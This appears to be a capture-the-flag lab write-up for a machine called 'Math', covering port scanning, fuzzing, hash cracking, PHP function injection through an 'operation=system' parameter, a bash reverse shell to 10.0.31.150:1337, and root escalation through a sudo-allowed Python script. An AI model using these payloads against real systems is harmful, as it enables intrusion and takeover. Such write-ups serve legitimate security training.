Published on

Math Writeup

Authors
logo

Port Scanning

nmap -sV -sC -p- -v $IP --open -T 5

math

Only ports 22 (SSH) and 80 (HTTP) are open.

Enumeration

http://172.16.1.79

math 1

I tested SQL Injection and default credentials on this login page, but without success.

Fuzzing

ffuf -w /usr/share/seclists/Fuzzing/fuzz-Bo0oM.txt -u http://172.16.1.79/FUZZ -e .php .txt .log .zip .py -ic
math 2

File backup.zip was found.

math 3

After downloading it, we can see it contains the source code of the application.

Hardcoded hash found inside the source code.

math 4

I used John the Ripper to crack the hash.

john --wordlist=/usr/share/wordlists/rockyou.txt hash
math 5

Credencial f4:1q2we

With that, we can log into the application.

The application is a website under development meant to help students solve math operations.

math 6

Code Review

math 7

If the page parameter is set and the value is math, we are redirected to /math.php.

Analyzing the math.php file, we can see we have control over the math operations that the application performs.

math 8

Function Injection

Knowing we control the parameters and the application lacks sanitization, we can exploit the function like this:

/math.php?operation=system&firstNum=id&secondNum=1

math 9

Foot Hold

/math.php?operation=system&firstNum=bash -c 'exec bash -i &>/dev/tcp/10.0.31.150/1337 <&1'&secondNum=1

Note: Don’t forget to encode the payload.

math 10

nc -lnvp 1337

math 11
math 12

Privillege Escalation

Inside the /home/f4 directory, we can see a note revealing his password.

math 13
math 14

sudo -l

math 15

We can see the user is allowed to run the verify.py script as root without a password.

cat verify.py

math 16

Basically, the script reads a file and checks if it exists.

Knowing this, we’ll make it read the /bin/bash file, which will grant us root privileges on the machine.

__import__('os').system('/bin/bash')
math 17

Proof

math 18
Discuss on TwitterView on GitHub